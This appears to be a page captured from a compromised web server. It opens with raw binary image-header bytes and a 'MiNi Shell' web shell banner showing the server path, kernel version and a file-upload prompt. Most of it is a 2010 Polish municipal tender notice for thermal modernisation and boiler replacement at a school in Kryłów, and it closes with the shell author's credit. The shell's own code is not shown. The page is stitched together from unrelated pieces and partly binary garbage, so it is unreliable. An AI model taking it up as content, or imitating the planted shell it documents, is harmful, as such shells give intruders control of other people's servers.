JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100526/135085-N-2010.html

<p class="kh_header"><b>Hrubieszów: TERMOMODERNIZACJA  BUDYNKU UŻYTECZNOSCI PUBLICZNEJ - SZKOŁA PODSTAWOWA im. Batalionów Chłopskich w KRYŁOWIE/ GMINAZJUM PUBLICZNE W KRYŁOWIE PRZY UL. HRUBIESZOWSKIEJ 4 
ZADANIE GMINY MIRCZE - PARTNERA PROJEKTU
Odnawialne źródła energii  i termomodernizacja    budynków użyteczności publicznej</b><br>
<b>Numer ogłoszenia: 135085 - 2010; data zamieszczenia: 26.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hrubieszów , ul. mjr H. Dobrzańskiego "Hubala" 1, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6962380 w. 54, faks 084 6962380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.hrubieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> TERMOMODERNIZACJA  BUDYNKU UŻYTECZNOSCI PUBLICZNEJ - SZKOŁA PODSTAWOWA im. Batalionów Chłopskich w KRYŁOWIE/ GMINAZJUM PUBLICZNE W KRYŁOWIE PRZY UL. HRUBIESZOWSKIEJ 4 
ZADANIE GMINY MIRCZE - PARTNERA PROJEKTU
Odnawialne źródła energii  i termomodernizacja    budynków użyteczności publicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie TERMOMODERNIZACJI  BUDYNKU UŻYTECZNOSCI PUBLICZNEJ - SZKOŁA PODSTAWOWA im. Batalionów Chłopskich w KRYŁOWIE/ GMINAZJUM PUBLICZNE W KRYŁOWIE PRZY UL. HRUBIESZOWSKIEJ 4,
Zakres robót  obejmuje wykonanie robót polegających na doociepleniu budynku, wymianie stolarki okiennej i drzwiowej,  wymianie instalacji odgromowej, wymianie obróbek blacharskich,  wykonaniu opasek odwadniających, nawierzchni z kostki brukowej   oraz przebudowie  kotłowni,  polegającej na wymianie kotła centralnego ogrzewania, wymianie instalacji centralnego ogrzewania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.00.00-6, 45.32.10.00-3, 45.42.10.00-4, 45.33.11.10-0, 45.33.11.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie przewiduje wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga dysponowania osobami zdolnymi do wykonania zamówienia tj. dysponowania  co najmniej jedną osobą posiadającą  uprawnienia budowlane  w zakresie kierowania robotami budowlanymi. 
Warunek zostanie spełniony po przedłożeniu wykazu i oświadczenia jn:

1. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi w przypadku Zadania nr 1 a w przypadku Zadania nr 2 odpowiedzialnych za kierowanie robotami w specjalności instalacyjnej w zakresie sieci i instalacji sanitarnych  , wpisanych na listę członków Okręgowej Izby Inżynierów Budownictwa wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - odrębnie dla poszczególnych zadań
2. oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnia- odrębnie dla poszczególnych zadań 
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	formularz oferty, stanowiący załącznik nr 1  do  SIWZ
2.	dokumenty i oświadczenia, o których mowa w części IX SIWZ, 
3.	w przypadku udziału podwykonawców - załącznik nr 6
4.	Oświadczenie z przeprowadzonej wizji w terenie  - załącznik nr 9
5.	pisemne zobowiązanie innych  podmiotów do oddania wykonawcy  do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia- jeżeli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień umowy oraz określa warunki zmian:
    - Kwota wynagrodzenia brutto może ulec zmianie w przypadku ustawowej zmiany obowiązującej  
      stawki VAT o wielkość    wynikającą ze zmiany stawki. 
    - Termin zakończenia robót budowlanych może ulec zmianie z powodu niekorzystnych warunków  
      atmosferycznych  (takich jak intensywne opady deszczu, silny wiatr) zamawiający może  
       przedłużyć termin wykonania umowy o czas  niezbędny do wykonania zamówienia uwzględniając  
      tylko dni niekorzystne.
   - Zamawiający może zawiesić wykonanie umowy na okoliczność wniesienia odwołania
   - Zamawiający może przedłużyć termin wykonania robót budowlanych o czas niezbędny do   
     rozpatrzenia odwołania, jeżeli  wystąpi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miasto.hrubieszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można  uzyskać bezpłatnie pod adresem Urząd Miasta w Hrubieszowie - Wydział Gospodarki Mieniem Komunalnym i Ochrony Środowiska  ul. 3-go Maja 15 tel. 084 6962380 w. 56.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2010 godzina 09:00, miejsce: Oferty należy dostarczyć do siedziby Zamawiającego( sekretariat), bądź przesłać na poniższy adres Zamawiającego:
Gmina Miejska Hrubieszów
ul. Mjr H. Dobrzańskiego Hubala 1,  22-500 Hrubieszów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR  1
BUDYNEK UŻYTECZNOSCI PUBLICZNEJ - SZKOŁA PODSTAWOWA im. Batalionów Chłopskich w KRYŁOWIE/ GMINAZJUM PUBLICZNE W KRYŁOWIE PRZY UL. HRUBIESZOWSKIEJ 4 - termomodernizacja budynku : Roboty dociepleniowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie poniższego zakresu robót:
1.   Obróbki blacharskie z blachy powlekanej o szer. w rozwinięciu ponad 25 cm -   
       lecz parapety zewnętrzne okien. - 67.960 m2
2.	Rozebranie obróbek murów ogniowych, okapów, kołnierzy, gzymsów itp. z blachy nie nadającej się do użytku. - 67.960 m2
3.	Docieplenie ścian płytami styropianowymi - przy użyciu got. zapraw klejących wraz z przyg. podłoża i ręczne wyk. wypraw elew. z got. suchej mieszanki. Płyty styropianowe EPS 70-040 grubości 8 cm. - 1025.330 m2
4.	Ocieplenie ścian budynków płytami styropianowymi metodą lekką-mokrą przy użyciu gotowych zapraw klejących - przymocowanie płyt styropianowych za pomocą dybli plastikowych do ścian z betonu. - 6315.000 szt
5.	Docieplenie ścian budynków płytami styropianowymi - zamocowanie listwy cokołowej. - 112.500 m
6.	Docieplenie ścian budynków płytami styropianowymi - ochrona narożników wypukłych kątownikiem metalowym. 846.500 m
7.	Rusztowanie ramowe przyścienne RR - 1/30 wysokości do 10 m. - 1025.330 m2
8.	Instalacje odgromowe na rusztowaniach zewnętrznych przyściennych wysokości do 15 m. - 1025.330 m2
9.	Instalacje cieplne I przeciwdźwiękowe z wełny mineralnej poziome z płyt układanych na sucho - jedna warstwa -gr. 14 cm. - 270.000 m2
10.	Wyjęcie ościeżnicy o powierzchni ponad 2 m2. - 314.010 m2
11.	Montaż okien rozwieranych i uchylno-rozwieranych dwudzielnych z PCV z obróbką obsadzenia o pow. ponad 2,5 m2. - 220.910 m2
12.	Okna tradycyjne - drewniane. - 79.980 m2
13.	Montaż drzwi stalowych I przegród pełnych. - 13.120 m2
14.	Przygotowanie starego podłoża pod docieplenie metodą lekką - oczyszczenie mechaniczne i zmycie. Cokół. - 122.000 m2
15.	Ocieplenie ścian budynków z betonu płytami styropianowymi metodą lekką-mokrą wraz z przyg. podłoża i ręczne wyk. wyprawy elewacyjnej cienkowarstwowej z got. suchej mieszanki. Płyty styropianowe gr. 8 cm. Tynk mozaikowy Bolix TM. - 122.000 m2
16.	Ocieplenie ścian budynków płytami styropianowymi metodą lekką-mokrą przy użyciu gotowych zapraw klejących - przymocowanie płyt styropianowych za pomocą dybli plastikowych do ścian z betonu. 732.000 szt
17.	Ocieplenie ścian budynków płytami styropianowymi - przyklejenie dodatkowej warstwy siatki na ścianach-cokół. - 122.000 m2
18.	Docieplenie ścian budynków płytami styropianowymi - przy użyciu got. zapraw klejących wraz z przyg. podłoża i ręczne wyk. wyprawy elew. z got. suchej mieszanki - ochrona narożników wypukłych kątownikiem metalowym. - 58.000 m
19.	Rozebranie chodników, wysepek przystankowych I przejść dla pieszych z płyt betonowych 35x35x5 cm na podsypce piaskowej. - 190.290 m2
20.	Rozebranie krawężników betonowych 15x30 cm na podsypce piaskowej. - 82.300 m
21.	Nawierzchnie z kostki brukowej betonowej grubości 6 cm na podsypce cementowo-piaskowej. - 190.290 m2
22.	Ława pod krawężniki z pospółki. - 2.058 m3
23.	Obrzeża betonowe o wymiarach 20x6 cm na podsypce piaskowej z wypełnieniem spoin zaprawą cementową. - 82.300 m
24.	Roboty ziemne z przewozem gruntu taczkami na odległość do 10 m (kat. gruntu III). (pod część opaski). - 2.940 m3
25.	Rynny dachowe półokrągłe o śr. 12 cm - z blachy stalowej ocynkowanej. - 279.000 m
26.	Rozebranie rynny z blachy nie nadającej się do użytku. - 279.000 m
27.	Rury spustowe okrągłe o śr. 12 cm - z blachy stalowej ocynkowanej. - 197.000 m
28.	Rozebranie rury spustowej z blachy nie nadającej się do użytku. - 197.000 m
29.	Wymiana przewodów instalacji odgromowej naprężanej (zwód pionowy) na uprzednio zainstalowanych wspornikach na ścianie. 28.000 m
30.	Docieplenie ścian płytami styropianowymi - przy użyciu got. zapraw klejących - ościeża okien. Płyty styropianowe EPS 70-40 gr.2 em. - 13.330 m2

Część dociepleniowa styropianem nie dotyczy starego budynku szkoły wpisanego do rejestru zabytków.

Zakres robót określają załączone przedmiary robót:
Załącznik  nr 2 - roboty budowlane -Wszystkie obmiary są wartościami orientacyjnymi i należy przeprowadzić dokładne obmiary na miejscu

       Wykonawca może zastosować materiały równoważne, ale muszą one być nie gorsze od materiałów zastosowanych w dokumentacji lub muszą przewyższać jakością materiały ujęte w dokumentacji. Zastosowanie materiałów równoważnych musi być zaakceptowane przez pracownika. Pracownik urzędu zgadza się na zastosowanie materiałów równoważnych przed ich wbudowaniem po otrzymaniu od wykonawcy niezbędnych dokumentów, badań itp.
       W przypadku zastosowania materiałów równoważnych dotyczących Zadania nr  1 zamówienia wykonawca przedstawi niezbędne certyfikaty lub badania dla wszystkich materiałów tzw. równoważnych. na etapie składania ofert.
Szczegółowy zakres robót oraz technologię robót określa dokumentacja projektowa. Przedmiary robót i kosztorysy załączone do specyfikacji są opracowaniem wtórnym w stosunku do projektu dokumentacji projektowej. Zawierają zestawienie przewidywanych robót w celu zobrazowania skali zamierzenia budowlanego i ułatwienia Wykonawcom oszacowania kosztów realizacji inwestycji, dlatego co do zasady pełnią funkcję pomocniczą. gdyż cena za wykonanie przedmiotu zamówienia jest CENĄ RYCZAŁTOWĄ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.00.00-6, 45.32.10.00-3, 45.42.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR  2
BUDYNEK UŻYTECZNOSCI PUBLICZNEJ - SZKOŁA PODSTAWOWA im. Batalionów Chłopskich w KRYŁOWIE/ GMINAZJUM PUBLICZNE W KRYŁOWIE PRZY UL. HRUBIESZOWSKIEJ 4 Przebudowa kotłowni, wymiana kotła centralnego ogrzewania, wymiana instalacji centralnego ogrzewania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
- Demontaż istniejących urządzeń, armatury, rurociągów i izolacji cieplnej w kotłowni,
- Demontaż grzejników armatury i rurociągów w obiektach,
- Montaż kotłów,
- Montaż urządzeń kotłowni zgodnie z dokumentacją techniczną;
- Montaż instalacji odprowadzenia spalin i wentylacji;
- Montaż grzejników,
- Montaż rurociągów i armatury;
- Zabezpieczenie antykorozyjne i izolacja cieplna rurociągów;
- Uruchomienie i regulacja pracy kotłowni i instalacji centralnego ogrzewania,
- Wykonanie robót budowlano-adaptacyjnych.

Kotłownia
Kotłownia będzie wytwarzać ciepło dla potrzeb instalacji centralnego ogrzewania obiektów Szkoły w Kryłowie. Jako paliwo podstawowe przyjmuje się pelet ze słomy (z możliwością spalania węgla - eko groszek). Przyjęto jeden kocioł CS 180 D Alessandro Termomeccanica 


o mocy 180 kW wyposażony w układ automatycznego podawania paliwa i odpopielania oraz w regulatory. Łączna maksymalna moc cieplna kotłowni wyniesie 180 kW

Instalacja C.O.
Należy wykonać wymianę instalacji c.o. w budynku - starym  Szkoły. System zaprojektowano, jako wodny, dwururowy, mieszany, pompowy o parametrach czynnika grzewczego 75/55°C. Projektowane instalacje zasilane będą z projektowanej kotłowni zlokalizowanej w podpiwniczeniu przyległym do Szkoły. Projektuje się wykonanie instalacji z rur stalowych - grzejniki płytowe stalowe PURMO typ C. lub równoważne. Wszystkie grzejniki wyposażone będą w zawory grzejnikowe termostatyczne i
powrotne Danfoss lub równoważne.

1. Zakres robót określają załączone przedmiary robót:
    Załącznik  nr 2a - instalacja  co. 
    Załącznik  nr 2b - kotłownia
Wszystkie obmiary są wartościami orientacyjnymi i należy przeprowadzić dokładne obmiary na miejscu
2. Dokumentacja techniczna wraz ze specyfikacją techniczną wykonania i odbioru robót   
    stanowi załącznik nr 10
3.W przypadku zastosowania materiałów równoważnych dotyczących Zadania nr 2 zamówienia wykonawca przedstawi niezbędne certyfikaty lub badania dla wszystkich materiałów tzw. równoważnych, a w przypadku przebudowy kotłowni centralnego ogrzewania Wykonawca przedstawi dokumenty, które jednoznacznie określą spełnienie równoważności materiałów i urządzeń zaproponowanych w dokumentacji projektowej, projekcie budowlanym i SST na etapie składania ofert..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.11.10-0, 45.33.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com